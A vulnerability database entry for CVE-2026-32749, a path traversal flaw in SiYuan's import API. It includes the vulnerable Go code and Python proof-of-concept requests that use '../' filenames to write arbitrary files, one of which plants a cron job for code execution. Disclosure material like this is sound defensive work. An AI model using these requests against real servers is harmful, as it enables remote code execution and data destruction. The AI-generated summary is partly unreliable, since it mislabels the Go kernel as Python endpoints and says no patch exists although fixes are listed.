Python
CVE-2026-32749
HIGH
Severity by source
AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:N
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
POST /api/import/importSY and POST /api/import/importZipMd write uploaded archives to a path derived from the multipart filename field without sanitization, allowing an admin to write files to arbitrary locations outside the temp directory - including system paths that enable RCE.
Details
File: kernel/api/import.go - functions importSY and importZipMd
file := files[0]
// ❌ file.Filename comes from the HTTP multipart header - fully user-controlled
writePath := filepath.Join(util.TempDir, "import", file.Filename)
// e.g. TempDir=/siyuan/workspace/temp, file.Filename="../../data/evil"
// → writePath = /siyuan/workspace/data/evil (escapes temp/import/)
writer, err := os.OpenFile(writePath, os.O_RDWR|os.O_CREATE, 0644)importZipMd has a second traversal in unzipPath construction:
filenameMain := strings.TrimSuffix(file.Filename, filepath.Ext(file.Filename))
unzipPath := filepath.Join(util.TempDir, "import", filenameMain)
gulu.Zip.Unzip(writePath, unzipPath) // unzipPath also escapes TempDirfilepath.Join calls filepath.Clean internally, but cleaning happens after concatenation - sufficient ../ sequences escape the base directory entirely. The curl tool sanitizes ../ in multipart filenames, so exploitation requires sending the raw HTTP request via Python requests or a custom client.
PoC
Environment:
docker run -d --name siyuan -p 6806:6806 \
-v $(pwd)/workspace:/siyuan/workspace \
b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123Exploit:
import requests, zipfile, io
HOST = "http://localhost:6806"
TOKEN = "YOUR_ADMIN_TOKEN"
# from Settings → About → API Token
# Create a valid .sy.zip payload
buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as z:
z.writestr("TestNB/20240101000000-abcdefg.sy",
'{"ID":"20240101000000-abcdefg","Spec":"1","Type":"NodeDocument","Children":[]}')
z.writestr("TestNB/.siyuan/sort.json", "{}")
buf.seek(0)
# Traversal filename - Python requests does NOT sanitize ../
r = requests.post(f"{HOST}/api/import/importSY",
headers={"Authorization": f"Token {TOKEN}"},
files={"file": ("../../data/TRAVERSAL_PROOF.zip", buf.read(), "application/zip")},
data={"notebook": "YOUR_NOTEBOOK_ID", "toPath": "/"})
print(r.text)
# Returns: {"code":0,"msg":"","data":null}
# File was written to /siyuan/workspace/data/TRAVERSAL_PROOF.zipRCE via cron (root container):
cron = b"* * * * * root touch /tmp/RCE_CONFIRMED\n"
r = requests.post(f"{HOST}/api/import/importSY",
headers={"Authorization": f"Token {TOKEN}"},
files={"file": ("../../../../../etc/cron.d/siyuan_poc", cron, "application/zip")},
data={"notebook": "NOTEBOOK_ID", "toPath": "/"})
# cron executes on next minute → /tmp/RCE_CONFIRMED appearsConfirmed response on v3.6.0: {"code":0,"msg":"","data":null}
Impact
An admin can write arbitrary content to any path writable by the SiYuan process:
- RCE via
/etc/cron.d/(root containers),~/.bashrc, SSHauthorized_keys - Data destruction by overwriting workspace or application files
- In Docker containers running as root (common default), this grants full container compromise
AnalysisAI
Path traversal in Python and Docker import endpoints allows authenticated administrators to write files to arbitrary filesystem locations by injecting directory traversal sequences in multipart upload filenames, potentially enabling remote code execution through placement of malicious files in executable paths. The vulnerability affects the POST /api/import/importSY and POST /api/import/importZipMd endpoints which fail to sanitize user-supplied filenames before constructing file write paths. No patch is currently available.
Technical ContextAI
The vulnerability affects the Go-based SiYuan kernel (pkg:go/github.com_siyuan-note_siyuan_kernel) in the import functionality at /api/import/importSY and /api/import/importZipMd endpoints. This is a classic CWE-22 path traversal vulnerability where user-controlled multipart filename fields are passed directly to filepath.Join() without sanitization, allowing directory traversal sequences (../) to escape the intended temp directory. While filepath.Join() internally calls filepath.Clean(), the cleaning occurs after concatenation, making it ineffective against sufficient traversal sequences. The vulnerability requires bypassing typical client-side sanitization by tools like curl, necessitating raw HTTP requests via Python requests or similar libraries.
RemediationAI
Upgrade SiYuan to a version that addresses this vulnerability once a patch is released by monitoring the vendor advisory at https://github.com/siyuan-note/siyuan/security/advisories/GHSA-qvvf-q994-x79v. Until patching is available, restrict admin API access to trusted IP addresses only, avoid running SiYuan containers as root user, and implement strict file system permissions to limit write access. For Docker deployments, use a non-root user context and read-only root filesystems where possible to mitigate the impact of successful exploitation.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-22 – Path Traversal
View allSame technique Path Traversal
View allVendor StatusVendor
SUSE
Severity: High| Product | Status |
|---|---|
| openSUSE Leap 15.6 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP5 | Fixed |
| SUSE Linux Enterprise Module for Package Hub 15 SP6 | Fixed |
| openSUSE Leap 15.5 | Fixed |
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-qvvf-q994-x79v